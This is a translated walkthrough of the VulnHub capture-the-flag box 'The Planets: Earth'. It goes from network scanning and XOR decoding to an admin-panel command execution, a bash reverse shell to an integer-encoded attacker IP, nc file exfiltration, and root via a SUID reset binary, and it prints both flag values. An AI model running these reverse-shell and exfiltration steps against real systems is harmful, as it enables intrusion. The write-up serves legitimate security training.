- 英文名称:The Planets: Earth
- Chinese name: planet: earth
- Published date: November 2, 2021
- Difficulty: Easy
- Description: Earth is an easy box, although you may find it more challenging than "Mercury" in this series, and depending on your experience, on the harder side of the easy. There are two flags on the box: a user logo and a root flag containing the md5 hash. This has been tested on VirtualBox, so it may not work properly on VMware. Please email SirFlash on http://protonmail.com with any questions/problems or feedback, although it may take a while for me to get back to you.
- Download: https://www.vulnhub.com/entry/the-planets-earth,755/
AILX10
Excellent answerer in cybersecurity
Master's in Cybersecurity
Go to consult
1. Tried to find the IP address, and found 1 suspicious IP
- earth.lan (192.168.199.179)
└─$ nmap -sP 192.168.199.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:21 CST
Nmap scan report for Hiwifi.lan (192.168.199.1)
Host is up (0.0027s latency).
Nmap scan report for 192.168.199.114
Host is up (0.0037s latency).
Nmap scan report for N3NXCV065297107.lan (192.168.199.151)
Host is up (0.0092s latency).
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.0020s latency).
Nmap scan report for kali.lan (192.168.199.247)
Host is up (0.00051s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.70 seconds 2. Try to scan the IP address port, port 22, port 80, port 443 are opened
$ nmap -A 192.168.199.179
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:28 CST
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.61s latency).
Not shown: 933 filtered tcp ports (no-response), 64 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time 3. To prepare for brute-force cracking of the website, you need to configure the hosts file first
192.168.199.179 terratest.earth.local
192.168.199.179 earth.local 4. The blasting result is as follows, port 80 has web background, port 443 has web homepage and robots file
---- Scanning URL: http://terratest.earth.local/ ----
+ http://terratest.earth.local/admin (CODE:301|SIZE:0)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521) 5. Visit the web page and find the testingnotes.* access path in the robots.txt
Home
background
robot.txt
6. Follow the prompts to enter the testingnotes.txt page and get 2 clues
- 密钥线索:testdata.txt
- Username clue: Terra
Leads page
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
测试安全消息系统注意事项:
*使用 XOR 加密作为算法,在 RSA 中使用应该是安全的。
*地球已确认他们已收到我们发送的消息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
去做:
*我们如何安全地将我们的每月密钥发送到地球? 还是我们应该每周更换密钥?
*需要测试不同的密钥长度以防止暴力破解。 钥匙应该多长?
*需要改进消息界面和管理面板的界面,目前非常基础。 7. Follow the clues and continue to look
Leads page
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
根据辐射测年估计和其他证据,地球形成于 45 亿年前。
在地球历史的最初十亿年中,生命出现在海洋中并开始影响地球的大气和地表,导致厌氧生物和后来的需氧生物的扩散。
一些地质证据表明,生命可能早在 41 亿年前就已经出现。 8. In the home page, you find that there are 3 ciphertexts, and you need to calculate the corresponding plaintext according to the above prompts
3 ciphertext in the first page
Previous Messages:
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a 9. XOR decode the 3 messages on the homepage, and get the prompt: EarthClimateChangeBad4Humans
b'According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth\'s hisCfy //}omo;/ppeare\'2~d;\x7ff$\'x,\x7fjj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/j\x7fkr0~h<Pj1s.=\x06i\x97\xf3\xdcs-q,<j${ugn$u6&\x7f*+o\'erlj|mnn/?;-\'\x7f1%,f{kx8.`\x7fb)"\x8c\xe5\x99np`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-\x17skl)$In*\'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky\x7f8/k<\x0b6=+1\x80\xe8\xdaq*Ir8xo"P|7wfbn'
b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the prol^rrlj~<evy\x7f{&*xk|h$kaw-oc 0-'web146iqc$hte7af#`ec~)o>kFnkukzdt|a>y~ciyvb~jn$6O?0i~\x7fd|0v|$lx4~%5l3d*`mx6a8{vcketdia %e,{tr9x>q{1w$h&v~oaxx-)if4tv6pudk"
b'earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat' Decoding Code Reference:
import binascii
import base64
data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
s1 = (hex(int(data1,16) ^ int(f,16)))
t1 = base64.b16decode(str(s1[2:]).upper())
s2 = (hex(int(data2,16) ^ int(f,16)))
t2 = base64.b16decode(str(s2[2:]).upper())
s3 = (hex(int(data3,16) ^ int(f,16)))
t3 = base64.b16decode(str(s3[2:]).upper())
print(t1)
print(t2)
print(t3) 10. With the username + password, I successfully logged in to the test page and found that it was a command execution
Test the backend page
11. Try to bounce the shell through NC
攻击机:
nc -lvnp 4444
靶机:
bash -i >& /dev/tcp/3232286711/4444 0>&1 Wherein: 3232286711 is the integer conversion of IP addresses, which can be referred to the code:
import socket
import struct
ip = "192.168.199.247"
int_ip = socket.ntohl(struct.unpack("I",socket.inet_aton(str(ip)))[0])
print(int_ip) Successfully got the shell
The bounce shell is successful
12. Try to find the flag
find / -name "*flag*" 2>/dev/null Find the flag file location
Get the hidden position of the flag:
/var/earth_web/user_flag.txt Check out the content of the flag:
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d] 13. Continue to look for the flag of the root user and look for the file with the suid permission
bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1 Execute /usr/bin/reset_root
bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
检查是否存在复位触发器...
重置失败,所有触发器都不存在。 14. Send the reset_root file back to the local tracking execution, and use the NC file transfer function here
攻击机:
└─# nc -lvp 5555 >reset_root
listening on [any] 5555 ...
connect to [192.168.199.247] from terratest.earth.local [192.168.199.179] 53332
靶机:
bash-5.1$ nc 192.168.199.247 5555 < /usr/bin/reset_root
nc 192.168.199.247 5555 < /usr/bin/reset_root
15. Debugging locally, I found that 3 folders are missing
- /dev/shm/kHgTFI5G
- /dev/shm/Zw7bV9U5
- /tmp/kcM0Wewe
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root
zsh: 权限不够: ./reset_root
┌──(root㉿kali)-[/home/ailx10]
└─# ls -hl reset_root
-rw-r--r-- 1 root root 24K 8月 20 15:20 reset_root
┌──(root㉿kali)-[/home/ailx10]
└─# chmod +x reset_root
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
┌──(root㉿kali)-[/home/ailx10]
└─# strace reset_root
strace: Can't stat 'reset_root': 没有那个文件或目录
┌──(root㉿kali)-[/home/ailx10]
└─# strace ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffecb5955a0 /* 32 vars */) = 0
brk(NULL) = 0x7bd000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (没有那个文件或目录)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=87631, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 87631, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe7b3a83000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0?\323\315\324#\241\204X\331\333:^P\242\263\300"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1904752, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a81000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1938296, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe7b38a7000
mprotect(0x7fe7b38cd000, 1724416, PROT_NONE) = 0
mmap(0x7fe7b38cd000, 1409024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fe7b38cd000
mmap(0x7fe7b3a25000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17e000) = 0x7fe7b3a25000
mmap(0x7fe7b3a72000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7fe7b3a72000
mmap(0x7fe7b3a78000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a78000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b38a5000
arch_prctl(ARCH_SET_FS, 0x7fe7b3a82580) = 0
mprotect(0x7fe7b3a72000, 12288, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ) = 0
mprotect(0x7fe7b3ac8000, 8192, PROT_READ) = 0
munmap(0x7fe7b3a83000, 87631) = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
brk(NULL) = 0x7bd000
brk(0x7de000) = 0x7de000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (没有那个文件或目录)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (没有那个文件或目录)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (没有那个文件或目录)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0) = ?
+++ exited with 0 +++ So create the folder
bash-5.1$ mkdir dev/shm/kHgTFI5G
mkdir dev/shm/kHgTFI5G
bash-5.1$ mkdir /dev/shm/Zw7bV9U5
mkdir /dev/shm/Zw7bV9U5
bash-5.1$ mkdir /tmp/kcM0Wewe
mkdir /tmp/kcM0Wewe 16. Try resetting the root password again
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
检查是否存在复位触发器...
存在重置触发器,正在将根密码重置为:地球 得到root密码:Earth
17. Switch to root and search for flag again
su -u root Switch to root
cat /root/root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at [email protected]
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
At this point, the experiment is complete~
Published on 2022-08-20 15:39